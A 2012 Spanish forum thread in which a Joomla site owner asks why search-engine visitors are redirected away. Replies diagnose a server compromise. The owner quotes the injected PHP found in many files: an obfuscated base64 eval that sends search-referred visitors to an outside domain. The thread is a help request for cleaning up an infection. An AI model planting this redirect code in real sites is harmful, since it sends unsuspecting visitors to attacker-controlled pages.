Foros del Web » Estrategias Digitales y Negocios Online » SEO »

Mi pagina me redirecciona cuando se busca desde Google

Estas en el tema de Mi pagina me redirecciona cuando se busca desde Google en el foro de SEO en Foros del Web. Hola a todos, Necesito ayuda urgente, es un problema muy grave ya que pierdo visitas sin poder hacer nada. Mi pagina es www.euroviajar.com y si ...
  #1 (permalink)  
Antiguo 15/02/2012, 06:06
Avatar de Mizunga  
Fecha de Ingreso: septiembre-2009
Mensajes: 125
Antigüedad: 14 años, 6 meses
Puntos: 2
Exclamación Mi pagina me redirecciona cuando se busca desde Google

Hola a todos,

Necesito ayuda urgente, es un problema muy grave ya que pierdo visitas sin poder hacer nada. Mi pagina es www.euroviajar.com y si accedeis escribiendo la dirección en la barra del navegador si que podeis entrar, en cambio, si vais a google.com y buscais euroviajar os aparecera en los primeros resultados pero no os dejara acceder.

¿Alguien puede decirme que es por favor?

PD: Con bing me pasa lo mismo...
__________________
Diseño Web y Photoshop.
  #2 (permalink)  
Antiguo 15/02/2012, 10:01
Avatar de hasdpk  
Fecha de Ingreso: agosto-2011
Ubicación: $spain->city( 'Arucas' );
Mensajes: 1.800
Antigüedad: 12 años, 6 meses
Puntos: 297
Respuesta: Mi pagina me redirecciona cuando se busca desde Google

Tiene pinta de que tienes un troyano en la web, así me lo ha detectado el antivirus (Avast!).

¿Qué sistema de CMS usas para la página?
  #3 (permalink)  
Antiguo 15/02/2012, 11:26
Avatar de Mizunga  
Fecha de Ingreso: septiembre-2009
Mensajes: 125
Antigüedad: 14 años, 6 meses
Puntos: 2
Respuesta: Mi pagina me redirecciona cuando se busca desde Google

Utilizo Joomla! y "he encontrado la solución", el que haya hecho esto, lo que hace es modificar todos los archivos .php con:

Código PHP:
Ver original
  1. eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly8yZmV2cmpkZWoub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

El tema que todos los php no, pero muchos están infectados y no se como borrarlo de todos a la vez para librarme de esto...
__________________
Diseño Web y Photoshop.
  #4 (permalink)  
Antiguo 15/02/2012, 12:51
Avatar de emprear
Colaborador
 
Fecha de Ingreso: junio-2007
Ubicación: me mudé
Mensajes: 8.388
Antigüedad: 16 años, 9 meses
Puntos: 1567
Respuesta: Mi pagina me redirecciona cuando se busca desde Google

Te hackearon el server sin duda

Borra todo por ftp y rehacelo verificando la seguridad de tus scripts.
Contactate con el soporte de tu hosting, no sea que el fallo en la seguridad no esté a un nivel más alto
Saludos

PD:
Sería oportuno que reportes tu mensaje para que borren el link, no sea cosa que algún otro usuario que intente ayudarte se vea perjudicado al visitar tu página
__________________
La voz de las antenas va, sustituyendo a Dios.
Cuando finalice la mutación, nueva edad media habrá
S.R.

Etiquetas: google, hack, redireccionar
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 12:44.